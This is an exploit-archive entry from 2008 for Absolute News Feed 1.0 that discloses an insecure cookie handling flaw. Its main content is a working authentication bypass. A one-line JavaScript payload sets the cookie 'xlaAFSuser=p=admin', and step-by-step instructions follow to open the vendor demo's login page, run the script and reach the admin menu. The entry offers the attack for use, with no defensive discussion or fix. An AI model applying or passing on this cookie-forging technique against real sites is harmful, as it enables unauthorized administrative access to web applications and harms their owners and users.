[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Absolute News Feed 1.0 Remote Insecure Cookie Handling Vulnerability
# Published : 2008-10-31
# Author : Hakxer
# Previous Title : Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability
# Next Title : Absolute FAQ Manager 6.0 Insecure Cookie Handling Vulnerability


########################################################################
# Discovered by : Hakxer                                               #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com                      #
# -------------------------------                                      #
# Poc :                                                                #
# javascript:document.cookie="xlaAFSuser=p=admin";                     #
#                                                                      #
# [~] Exploit                                                          #
#                                                                      #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
# 								       #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
########################################################################

# www.Syue.com [2008-10-31]